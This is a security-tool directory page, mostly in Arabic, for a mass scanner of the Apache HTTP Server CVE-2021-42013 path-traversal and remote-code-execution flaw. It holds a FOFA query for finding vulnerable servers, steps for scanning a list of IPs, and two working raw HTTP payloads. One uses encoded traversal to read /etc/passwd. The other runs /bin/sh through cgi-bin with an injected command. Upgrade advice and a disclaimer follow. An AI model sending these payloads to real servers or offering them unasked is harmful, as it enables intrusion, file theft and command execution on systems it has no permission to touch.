Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-42013-Apache-RCE-Poc-Exp — أداة فحص جماعي لثغرة تنفيذ التعليمات البرمجية عن بُعد في Apache (CVE-2021-42013): Apache HTTP Server هو خادم ويب مفتوح المصدر تابع لمؤسسة أباتشي (Apache) الأمريكية. يتميز هذا الخادم بالسرعة والموثوقية وإمكانية التوسع من خلال واجهة برمجة تطبيقات (API) بسيطة. تم اكتشاف أن الإصلاح المقدم لثغرة CVE-2021-41773 في Apache HTTP Server 2.4.50 غير كافٍ. يمكن للمهاجم استخدام هجوم اجتياز المسار (Path Traversal) لتعيين عناوين URL إلى ملفات خارج الدلائل التي تم تكوينها بواسطة توجيهات من نوع الاسم المستعار (Alias). إذا لم تكن هذه الملفات خارج الدلائل محمية بالتهيئة الافتراضية المعتادة "Require all denied"، فمن المحتمل أن تنجح هذه الطلبات. وإذا تم أيضًا تمكين نصوص CGI البرمجية لتلك المسارات المستعارة، فقد يسمح ذلك بتنفيذ التعليمات البرمجية عن بُعد. تؤثر هذه المشكلة على Apache 2.4.49 وApache 2.4.50 فقط، ولا تؤثر على الإصدارات الأقدم. | Kitploit
أدوات/GitHubGitHub/asaotomo/cve-2021-42013-apache-rce-poc-exp
الاستطلاعماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubasaotomo/cve-2021-42013-apache-rce-poc-exp

CVE-2021-42013-Apache-RCE-Poc-Exp

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

عرض المستودع
10211منذ 4 سنواتلم تتم المراجعة بعد

أداة فحص جماعي لثغرة تنفيذ التعليمات البرمجية عن بُعد في Apache (CVE-2021-42013): Apache HTTP Server هو خادم ويب مفتوح المصدر تابع لمؤسسة أباتشي (Apache) الأمريكية. يتميز هذا الخادم بالسرعة والموثوقية وإمكانية التوسع من خلال واجهة برمجة تطبيقات (API) بسيطة. تم اكتشاف أن الإصلاح المقدم لثغرة CVE-2021-41773 في Apache HTTP Server 2.4.50 غير كافٍ. يمكن للمهاجم استخدام هجوم اجتياز المسار (Path Traversal) لتعيين عناوين URL إلى ملفات خارج الدلائل التي تم تكوينها بواسطة توجيهات من نوع الاسم المستعار (Alias). إذا لم تكن هذه الملفات خارج الدلائل محمية بالتهيئة الافتراضية المعتادة "Require all denied"، فمن المحتمل أن تنجح هذه الطلبات. وإذا تم أيضًا تمكين نصوص CGI البرمجية لتلك المسارات المستعارة، فقد يسمح ذلك بتنفيذ التعليمات البرمجية عن بُعد. تؤثر هذه المشكلة على Apache 2.4.49 وApache 2.4.50 فقط، ولا تؤثر على الإصدارات الأقدم.

مشاركة

اسم الثغرة

تنفيذ التعليمات البرمجية عن بُعد في Apache (CVE-2021-42013)

وصف الثغرة

Apache HTTP Server هو خادم ويب مفتوح المصدر تابع لمؤسسة Apache الأمريكية. يتميز بالسرعة والموثوقية وإمكانية التوسع عبر واجهة برمجة تطبيقات بسيطة. تم اكتشاف أن الإصلاح المقدم لـ CVE-2021-41773 في Apache HTTP Server 2.4.50 غير كافٍ. يمكن للمهاجم استخدام هجوم اجتياز المسار لتعيين عنوان URL لملفات خارج الدلائل المكونة بواسطة توجيهات مشابهة للأسماء المستعارة. إذا لم تكن هذه الملفات خارج الدلائل محميةً بالإعداد الافتراضي المعتاد "Require all denied"، فقد تنجح هذه الطلبات. وإذا تم أيضًا تمكين نصوص CGI لهذه المسارات المستعارة، فقد يسمح ذلك بتنفيذ التعليمات البرمجية عن بُعد. تؤثر هذه المشكلة فقط على Apache 2.4.49 وApache 2.4.50، ولا تؤثر على الإصدارات الأقدم.

النطاق المتأثر

Apache HTTP Server 2.4.49

Apache HTTP Server 2.4.50

صيغة FOFA

server="Apache/2.4.49" || server="Apache/2.4.50"

طريقة الاستخدام

1.将准备检测的IP地址放入ip.txt文件中
2.运行python3 check.py
image

POC

GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1
Host: vuglfocus.fofa.so:55493
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ZMSESSID=fcnisfo6rj1snid6e5r27kj1n0; zmSkin=classic
Connection: close
image

EXP

GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
Host: vuglfocus.fofa.so:55493
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ZMSESSID=fcnisfo6rj1snid6e5r27kj1n0; zmSkin=classic
Connection: close
Content-Length: 57

echo Content-Type: text/plain; echo;ls /

img

توصيات الإصلاح

تم إصلاح هذه الثغرات حاليًا، ونظرًا لخطورتها، يُنصح المستخدمون المتأثرون بالترقية فورًا إلى Apache HTTP Server 2.4.51 (الذي صدر في 7 أكتوبر) أو إصدار أحدث.

رابط التحميل:

https://httpd.apache.org/download.cgi#apache24

ملاحظات

هذه الأداة مخصصة فقط لمختبرِي الأمن لإجراء الفحص الذاتي الأمني. لا يتحمل المؤلف أي عواقب ناتجة عن إساءة الاستخدام. يجب على المستخدمين الالتزام بالقوانين المحلية. لا يجوز استخدام هذا البرنامج لأغراض تجارية، ويقتصر على التعلم والتبادل.

147206848-6090876d-d029-4ffd-a6a8-ee4600071404
تنزيل الأداة